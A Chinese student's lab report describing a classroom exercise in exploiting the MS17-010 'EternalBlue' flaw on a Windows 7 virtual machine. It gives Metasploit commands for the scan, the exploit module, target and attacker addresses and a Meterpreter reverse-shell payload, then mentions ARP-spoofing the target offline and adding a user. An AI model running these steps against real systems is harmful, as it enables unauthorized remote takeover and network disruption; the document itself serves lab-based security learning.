【网络安全】MS17-010“永恒之蓝”漏洞的利用

导语

最近学期末进行网络安全实训，老师要求每个小组选择一个方向进行研究，本篇将讲述“永恒之蓝”漏洞的简单利用。

一、实验原理

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，电脑只要开机，攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、实验环境

三、实验记录

一次渗透的基本步骤

（1）启动kali虚机，进入root权限打开Metasploit渗透工具。
msfconsole

（4）使用use auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞。

（5）然后查看具体需要配置的东西
show options

注：实验一开始靶机选取的是OWASP，经过验证后发现不存在MS17-010漏洞，故更换为win7虚拟机。

补充：
（1）渗透攻击（Exploit）,指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞，所进行的攻击行为。

（2）攻击载荷（Payload），是我们期望目标系统在被渗透攻击之后去执行的代码。

（3）模块（Module），指Metasploit框架中所使用的一段软件代码组件，可用于发起渗透攻击或执行某些辅助攻击动作。

四、实验步骤

（1）关闭防火墙，ping通两台主机使其能访问外网。

在一台宿主主机上安装两个不同的虚拟机镜像构建一个虚拟的网络，其中，一台虚拟机为win7,一台虚拟机为Kali Linux。

• 打开VMware，“编辑”——“虚拟网络映射器”——“桥接模式”
  
• 将两台虚拟机的IP地址分配方式为自动获取（也就是动态IP）。

#The primary network interface
auto eth0
iface eth0 inet dhcp

• Kali Linux通过ifconfig查看IP地址（注意不是ip），测试连通性。
  
  
  

（2）代码植入控制靶机
msfconsole打开metasploit工具
search ms17_010查找漏洞
use exploit/windows/smb/ms17_010_eternalblue使用"永恒之蓝"攻击代码植入漏洞
set RHOST 192.168.47.132设置靶机
set LHOST 192.168.47.131设置攻击机
set payload windows/x64/meterpreter/reverse_tcp设置有效载荷
show options显示选项设置
用run进行攻击


到这就算成了(*￣rǒ￣)。

五、实现小操作

（6）查看操作系统补丁情况

（7）ARP断网攻击，给他把网断老。

-i 指定网卡

-t 指定目标ip

这里的192.168.47.2是网关

ARP断网攻击，欺骗对方无法上网，ctrl+c停止欺骗

（8）在win7上新建一个用户


（9）没了

原理

总结

老师一直不在，自己查资料坐牢一样,尤其是OWASP虚拟机搞半天没那个漏洞，差点换课题，总算混完了，还两门考试没复习呢摸了摸了。。(*￣rǒ￣)